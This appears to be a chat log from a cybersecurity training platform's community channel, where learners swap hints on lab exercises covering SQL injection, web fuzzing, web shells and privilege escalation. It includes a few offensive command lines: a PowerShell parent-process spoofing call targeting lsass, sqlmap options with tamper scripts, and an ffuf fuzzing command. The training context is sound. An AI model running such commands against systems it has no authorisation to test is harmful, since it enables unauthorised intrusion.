Trying to do the questions in module "Shells & Payloads" ==> "Web Shells" ==> "PHP Web Shells" but the rConfig application keeps crashing each time I access another link than Dashboard.php. Tried resetting the target twice, still not working.
Is there an outage/stability issues?
Anyone?
I cant post anywhere else but here
I am assuming you forgot to follow the instructions?
It's clearly mentioned what you need to do before you can message elsewhere
Im stuck at this question in Linux Privilege Escalation module in Environment Enumeration section. Any help would be appreciated
Hey everyone, i am a pentester and now trying to explore AI security (Chatbots and LLMs Security), I just started AI red teamer path, but it is too confusing, can someone guide me or someone wanna collaborate with me so that we can learn the path together.
Anyone can help me? curl 94.237.122.241:46599/download.php
I tried this command but nothing happen
from which section is that
Web request
HyperText Transfer Protocol (HTTP)
If you run the command you shared earlier, then you will get the answer to the exercise
I ran it but it didn't return anything and when I add an option for example -o, It says you need to specify url
Use the verbose option to see if you can talk to the target
I used it and it showed there is a file called flag.txt. Is the output supposed to be the flag or am i supposed to add a specific option?
I feel stupid sorry for these questions
It is in the form of HTB{s0m3_Text}
Hi everyone, I'm working on the Skills Assessment - SQL Injection Fundamentals. I've discovered the injection point is the invitation code, but I can't get the result using SQLMAP. I've used --risk 3 --level 5, --random-agent, and --tamper=space2comment, but nothing works. If anyone has done this before, please guide me and give me the command that can inject the result so I can study it. Thank you.😭
im going through the password attack module and trying to install dislocker
when doing a apt update or upgrade I get this - not sure if it's just me or common problem
https://academy.hackthebox.com/module/67/section/631 = i am trying to run 2nd command with Myprocess but i cant get it to run say it is not recognized
this command more precisely = .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").Id, "C:\Windows\System32\cmd.exe", "")
nvm figured it out
it was script updated so different command used
nvm found the solution here: https://superuser.com/questions/1042521/kali-linux-rolling-apt-get-upgrade-failed-to-fetch-404-not-found
Hi all! I stuck on "Attacking Common Applications - osTicket" question. Can someone give me a clue, please?
Give http://ip
You need to write your own command to look for the flag, the format is HTB{...}, and no it doesn't tell you anywhere
It is not supposed to get bypass that way you’ll need vanilla payload
What Is the question
Question: "Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson" no additional data provided.
I don't understand,I used the original payload and was unable to inject it
Login with the credentials of Kevin which was in walkthrough or section
It is supposed to be bypass by boolean vanilla payload bro it is about sql injection not sqlmap
Sqlmap has whole another section
OK,thanks,I'll try again
Just double checking, tier 0 modules are okay to share answers for? I finished the stack-based buffer overflow module for Windows x86 , and I want to post the code I wrote for the skills assessment to my github. There will be a README.md describing its function etc. This will not make me persona non grata correct?
I tried, not helps. I also found another vhost with business site and try mix login names from its About Us page with simple passwords.
What’s the endpoint where you’re loggin in with those creds
Yes it is not correct endpoint
got you!
hello @gravitv can i DM you ?
Regarding?
the same got the clue on the module further im stuck
Which module sql?
module-Web Fuzzing -Recursive Fuzzing-
Thank you! It helped!
Oh okay share the command here I’ll tell you what could be the mistake
No worries
the command is -ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -u 'http://IP:PORT/FUZZ' -e .html -recursion -recursion-depth 2 -t 50 -rate 500 -mc 200,301,302,403 -o ffuf_recursive.json -of json -v 2>ffuf_recursive.err
Extension is wrong
And you actually don’t require mc if you are matching all of them here
got a clue in one level , so you recommend to fuzz on ?
I don’t know if i can share but try most common one for Linux
im clueless
Most common man what language Wordpress is built on
thank you
so each user will find the flag somewhere different than the other? but it is a file with the name as the flag right
the flag is in the content of the file
like all challenges
its weird cause i tried everything in the section
you can't always just copy paste commands :p
hey can someone help me with the intro to evasion module the section LOLBAS: InstallUtil im stuck there
Man just use grep with HTB format it is not in the section have to figure out
There are some switches of grep which can help
I still can't pass the Skills Assessment - SQL Injection Fundamentals. Is there a document I can refer to? If it complies with the rules, thank you.
I can't build the payload
Have you bypassed registration page
NO
I tried to bypass the registration tonight and register the user to enter the background, but failed
Just apply the method you have learned in first sql injection section like how to bypass login page
Code is invalid means value is false how can you make it true
Sup everyone
OK, I'll try again, thank you for your help
There is very generic payload whenever we try to do sql we first inject that payload
OK,thanks!
Lmk if you found it and got it
I came in, I was trying to inject data before, thank you for giving me the direction
I'm already backstage
thanks bro i solved it
do let me know if you find path to get config after this as i have not done it after that
Can anyone give me hint for sql injection fundamentals skills assessment
Yes its okay to share content from tier 0 modules that are free
hey guys! is there any module about cryptography?
Stuck in File Inclusion skill assessment. Absolutely cannot find any vulnerable parameters
